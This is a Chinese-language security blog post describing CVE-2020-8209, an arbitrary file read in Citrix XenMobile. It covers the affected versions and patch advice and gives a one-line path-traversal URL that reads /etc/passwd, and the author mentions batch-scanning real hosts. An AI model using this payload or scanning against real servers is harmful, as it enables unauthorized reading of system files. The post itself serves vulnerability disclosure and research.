CVE-2020-8209（Citrix Endpoint Management 任意文件读取） – 作者:thelostworld

CVE-2020-8209（Citrix Endpoint Management 任意文件读取）

一、漏洞描述：

XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。

Citrix Endpoint Management 存在 任意文件读取漏洞，远程未授权攻击者 通过 发送特制HTTP请求，可以造成 读取受影响设备上任意文件 的影响。

二、影响版本

以下版本受到严重影响

XenMobile Server < 10.12 RP2

XenMobile Server < 10.11 RP4

XenMobile Server < 10.10 RP6

XenMobile Server < 10.9 RP5

以下版本受到中等影响

XenMobile Server < 10.12 RP3

XenMobile Server < 10.11 RP6

XenMobile Server < 10.10 RP6

XenMobile Server < 10.9 RP5

三、漏洞复现

POC很简单：直接访问url路径就是

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

直接访问就下载文件了

尝试批量跑了一下（基本上国外的较多使用）：

四、修补建议：

根据版本安装修补程序

XenMobile Server 10.12 RP3 XenMobile Server 10.11 RP6 XenMobile Server 10.10 RP6 XenMobile Server 10.9 RP5

参考：

https://cert.360.cn/warning/detail?id=c90721afed448a76134344672230c3ae

https://mp.weixin.qq.com/s/6s97cZepY11_IQDYD0bFwA（阿乐）

https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=CVE-2020-8209&fenlei=256&rsv_pq=a1f844480001758e&rsv_t=1cadbCZbwvAVhODBaYHphFmUgW3X9adpsH653gIO9l58hEDsKAE7iGLmXdA&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_sug3=2&rsv_sug1=1&rsv_sug7=001&rsv_sug2=0&rsv_btype=i&prefixsug=%2526lt%253BV%2526gt%253B-2020-8209&rsp=5&rsv_sug9=es_0_1&inputT=373&rsv_sug4=387&rsv_sug=9

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！

个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书：https://www.jianshu.com/u/bf0e38a8d400

个人CSDN：https://blog.csdn.net/qq_37602797/category_10169006.html

来源：freebuf.com 2021-01-15 21:54:52 by: thelostworld